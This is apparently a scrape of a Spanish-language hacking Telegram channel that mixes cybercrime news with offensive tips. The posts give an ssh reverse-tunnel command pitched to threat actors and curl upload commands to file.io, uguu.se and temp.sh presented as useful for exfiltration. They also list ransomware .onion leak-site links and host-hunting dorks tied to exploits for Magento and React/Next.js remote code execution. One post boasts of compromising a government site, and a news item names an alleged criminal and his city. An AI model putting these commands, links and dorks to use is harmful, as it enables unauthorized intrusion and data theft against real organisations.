Tunneling usando Serveo - Exponiendo servidor local a la internet 🛠
En esta ocasión vamos a usar otro servicio el cual es ampliamente usando para exponer servicio web de servidores victimas, no quiere instalación ni logeo lo que lo convierte en un servicio muy útil para actores de amenaza.
Estoy hablando de serveo.net en el cual solo se requiere ssh instalado, por ejemplo vamos a exponer nuestro servidor local.
Iniciar servidor
Exponiendo servidor
Nota: serveo.net no siempre se encuentra online
#manual #tunneling #hacking
En esta ocasión vamos a usar otro servicio el cual es ampliamente usando para exponer servicio web de servidores victimas, no quiere instalación ni logeo lo que lo convierte en un servicio muy útil para actores de amenaza.
Estoy hablando de serveo.net en el cual solo se requiere ssh instalado, por ejemplo vamos a exponer nuestro servidor local.
Iniciar servidor
sudo service nginx start
Exponiendo servidor
ssh -R 80:localhost:80 serveo.net
Nota: serveo.net no siempre se encuentra online
#manual #tunneling #hacking
❤8🤔1
Se revela la identidad de "Rey" administrador de Scattered LAPSUS$ Hunters y Hackers miembro de la pandilla de Ransomware Hellcat 🚨
• La identidad real de Rey es Saif Al-Din Khader, quien se cree que vive en Amán, Jordania.
• Antes de liderar SLSH, Rey supuestamente administraba un sitio web de filtraciones de un grupo de ransomware y gestionaba versiones de BreachForums, lo que demuestra sus profundos vínculos con la infraestructura clandestina del cibercrimen.
• La revelación de la identidad de Rey se debe a fallos en su OPSEC: los investigadores utilizaron datos de credenciales filtrados, registros de «infostealer» y una combinación única de correo electrónico y contraseña vinculada a su alias para confirmar el vínculo con su identidad real.
• Según el artículo, Rey afirma que está «intentando limpiar todo lo que me relaciona con ello y seguir adelante», y dice que lleva cooperando con las fuerzas del orden al menos desde junio de 2025.
• La identidad real de Rey es Saif Al-Din Khader, quien se cree que vive en Amán, Jordania.
• Antes de liderar SLSH, Rey supuestamente administraba un sitio web de filtraciones de un grupo de ransomware y gestionaba versiones de BreachForums, lo que demuestra sus profundos vínculos con la infraestructura clandestina del cibercrimen.
• La revelación de la identidad de Rey se debe a fallos en su OPSEC: los investigadores utilizaron datos de credenciales filtrados, registros de «infostealer» y una combinación única de correo electrónico y contraseña vinculada a su alias para confirmar el vínculo con su identidad real.
• Según el artículo, Rey afirma que está «intentando limpiar todo lo que me relaciona con ello y seguir adelante», y dice que lleva cooperando con las fuerzas del orden al menos desde junio de 2025.
😱6
🎅FSEC INTEL ES 2.0 📡 🏴☠️🎄
Se revela la identidad de "Rey" administrador de Scattered LAPSUS$ Hunters y Hackers miembro de la pandilla de Ransomware Hellcat 🚨 • La identidad real de Rey es Saif Al-Din Khader, quien se cree que vive en Amán, Jordania. • Antes de liderar SLSH,…
Krebs on Security
Meet Rey, the Admin of ‘Scattered Lapsus$ Hunters’
A prolific cybercriminal group that calls itself "Scattered LAPSUS$ Hunters" made headlines regularly this year by stealing data from and publicly mass extorting dozens of major corporations. But the tables seem to have turned somewhat for "Rey," the moniker…
Media Land LLC un Hosting a prueba de bala ruso fue sancionado por presuntamente apoyar operaciones de Ransomware y redes de Botnets. 🚨🇷🇺
Las autoridades lograron identificar a 3 personas claves dentro de la empresa rusa, Aleksandr Volosovik director general de Media Land, Kirill Zatolokin (Zatolokin) encargado de recibir los pagos y coordinar con actores de amenaza, Yulia Pankova (Pankova) está al tanto de la actividad ilícita de Volosovik, ha ayudado a Volosovik con cuestiones legales y ha manejado sus finanzas.
Como resultado de las sanciones los bienes dentro de los EEUU de Media Land serán confiscados.
https://home.treasury.gov/news/press-releases/sb0319
#rusia #busted
Las autoridades lograron identificar a 3 personas claves dentro de la empresa rusa, Aleksandr Volosovik director general de Media Land, Kirill Zatolokin (Zatolokin) encargado de recibir los pagos y coordinar con actores de amenaza, Yulia Pankova (Pankova) está al tanto de la actividad ilícita de Volosovik, ha ayudado a Volosovik con cuestiones legales y ha manejado sus finanzas.
Como resultado de las sanciones los bienes dentro de los EEUU de Media Land serán confiscados.
https://home.treasury.gov/news/press-releases/sb0319
#rusia #busted
👍5🔥2❤1
DIREWOLF Ransomware 🔐
http://direwolfcdkv5whaz2spehizdg22jsuf5aeje4asmetpbt6ri4jnd4qd.onion/
#onion #ransomware
http://direwolfcdkv5whaz2spehizdg22jsuf5aeje4asmetpbt6ri4jnd4qd.onion/
#onion #ransomware
🔥10
Forwarded from Freedom Fox 🏴☠
#Exploit для CVE-2025-54236 (SessionReaper) - Unauthenticated #RCE в Magento
https://github.com/rapid7/metasploit-framework/pull/20725
Netlas.io: tag.name:"magento" AND http.headers.server:"Apache"
FOFA: app="Magento"
HUNTER : product.name="Adobe Magento"
ZoomEye Dork: app="Magento"
Telegram✉️ @freedomfox
https://github.com/rapid7/metasploit-framework/pull/20725
Netlas.io: tag.name:"magento" AND http.headers.server:"Apache"
FOFA: app="Magento"
HUNTER : product.name="Adobe Magento"
ZoomEye Dork: app="Magento"
Telegram
Please open Telegram to view this post
VIEW IN TELEGRAM
❤7
Benzona Ransomware 🔐
http://benzona6x5ggng3hx52h4mak5sgx5vukrdlrrd3of54g2uppqog2joyd.onion/
#ransomware #onion
http://benzona6x5ggng3hx52h4mak5sgx5vukrdlrrd3of54g2uppqog2joyd.onion/
#ransomware #onion
🔥6
Servicio de Hosting File para subir ficheros desde la terminal util para exfiltracion ;) ⬆️🏴☠️
File.io
Limite de subida: 2GB
Tiempo de expiracion de fichero: 14 dias
https://file.io
Comando:
uguu.se
Limite de subida: 64MB
Tiempo de expiracion de fichero: 3 horas
https://uguu.se/
Comando:
temp.sh
Limite de subida: 4GB
Tiempo de expiracion de fichero: 3 dias
https://temp.sh/
Comando:
#tools #resources #terminal #exfiltracion
File.io
Limite de subida: 2GB
Tiempo de expiracion de fichero: 14 dias
https://file.io
Comando:
curl -F "file=@malware.bat" https://file.io
uguu.se
Limite de subida: 64MB
Tiempo de expiracion de fichero: 3 horas
https://uguu.se/
Comando:
curl -i -F files[]=@yourfile.jpeg https://uguu.se/upload
temp.sh
Limite de subida: 4GB
Tiempo de expiracion de fichero: 3 dias
https://temp.sh/
Comando:
curl -F "file=@test.txt" https://temp.sh/upload
#tools #resources #terminal #exfiltracion
www.file.io
file.io - Super simple file sharing
Sharing files with file.io is convenient, anonymous and secure. Just upload files and share the links via email, SMS, Slack, Discord, etc. Easy-to-use REST API.
❤9
🚨Exploit RCE en React (CVE-2025-55182)🏴☠️
Esta vulnerabilidad afecta a React Server Components (RSC) y los marcos que los implementan, particularmente Next.js. La vulnerabilidad, denominada “React2Shell” por los investigadores, permite la ejecución remota de código no autenticado a través de una única consulta HTTP.
🔍 DORKS
FOFA
ZOOMEYE
💣 EXPLOIT/Scanner
https://github.com/sumanrox/rschunter
#dorks #exploit #rce #github
Esta vulnerabilidad afecta a React Server Components (RSC) y los marcos que los implementan, particularmente Next.js. La vulnerabilidad, denominada “React2Shell” por los investigadores, permite la ejecución remota de código no autenticado a través de una única consulta HTTP.
🔍 DORKS
FOFA
app="NEXT.JS" || app="React.js"
ZOOMEYE
http.body="react.production.min.js" http.body="React.createElement(" app="React Router" app="React.js" app="next.js"💣 EXPLOIT/Scanner
https://github.com/sumanrox/rschunter
#dorks #exploit #rce #github
GitHub
GitHub - sumanrox/rschunter: Mass Hunting & Exploitation PoC for CVE-2025-55182 & CVE-2025-66478
Mass Hunting & Exploitation PoC for CVE-2025-55182 & CVE-2025-66478 - sumanrox/rschunter
❤5
🎅FSEC INTEL ES 2.0 📡 🏴☠️🎄
🚨Exploit RCE en React (CVE-2025-55182)🏴☠️ Esta vulnerabilidad afecta a React Server Components (RSC) y los marcos que los implementan, particularmente Next.js. La vulnerabilidad, denominada “React2Shell” por los investigadores, permite la ejecución remota…
Y ya tenemos nuestro primer .gob pwneado, como amo los RCE 😁❤️🏴☠️
🔥12❤3
https://www.acronis.com/es/tru/posts/makop-ransomware-guloader-and-privilege-escalation-in-attacks-against-indian-businesses/
#reporte #ransomware
#reporte #ransomware
Acronis
Ransomware Makop: GuLoader y elevación de privilegios en ataques contra empresas indias
Al igual que el ransomware Phobos, su variante Makop sigue aprovechando sistemas expuestos de Protocolo de escritorio remoto (RDP) mientras añade nuevos componentes como exploits de elevación local de privilegios y malware de tipo "loader" (cargador) a su…
Autoridades americanas extraditan a "Hacker" Ucraniana 🇺🇦🇷🇺
Segun el departamento de justicia de EEUU la ciudadana ucraniana Victoria Eduardovna Dubranova, de 33 años es acusada de coordianar y realizar ataques informaticos hacia infraestructura critica dentro de los EEUU y a paises de la OTAN.
Segun documentos de acusacion Dubranova formaba parte de grupos Hacktivista Pro-Rusos como CyberArmyofRussia_Reborn, Z-Pentest y Noname bajo el alias de "Vika" segun ayudo a realizar ataques a sistemas SCADA y realizar ataques de DDOS a varios servidores considerados enemigos de Rusia.
Dubranova fue extraditada a Estados Unidos a principios de este año acusada de apoyar a CyberArmyofRussia_Reborn y se espera que responda por multiples ataques informaticos.
https://www.courthousenews.com/wp-content/uploads/2025/12/united-states-vs-dubranova-indictment-one.pdf
https://www.justice.gov/opa/pr/justice-department-announces-actions-combat-two-russian-state-sponsored-cyber-criminal
#rusia #ucrania #busted #hackers
Segun el departamento de justicia de EEUU la ciudadana ucraniana Victoria Eduardovna Dubranova, de 33 años es acusada de coordianar y realizar ataques informaticos hacia infraestructura critica dentro de los EEUU y a paises de la OTAN.
Segun documentos de acusacion Dubranova formaba parte de grupos Hacktivista Pro-Rusos como CyberArmyofRussia_Reborn, Z-Pentest y Noname bajo el alias de "Vika" segun ayudo a realizar ataques a sistemas SCADA y realizar ataques de DDOS a varios servidores considerados enemigos de Rusia.
Dubranova fue extraditada a Estados Unidos a principios de este año acusada de apoyar a CyberArmyofRussia_Reborn y se espera que responda por multiples ataques informaticos.
https://www.courthousenews.com/wp-content/uploads/2025/12/united-states-vs-dubranova-indictment-one.pdf
https://www.justice.gov/opa/pr/justice-department-announces-actions-combat-two-russian-state-sponsored-cyber-criminal
#rusia #ucrania #busted #hackers
💅12🤔3❤2
Post-Explotacion en Windows sin herramientas (LOLBINS) 🛠🏴☠️
https://xbz0n.sh/blog/living-off-the-land-windows
#recursos #hacking #tools #windows
https://xbz0n.sh/blog/living-off-the-land-windows
#recursos #hacking #tools #windows
xbz0n.sh
Living Off the Land: Windows Post-Exploitation Without Tools
I'll never forget one of my first red team engagements where I learned this lesson the hard way. I'd spent two days carefully phishing my way into a financia...
❤10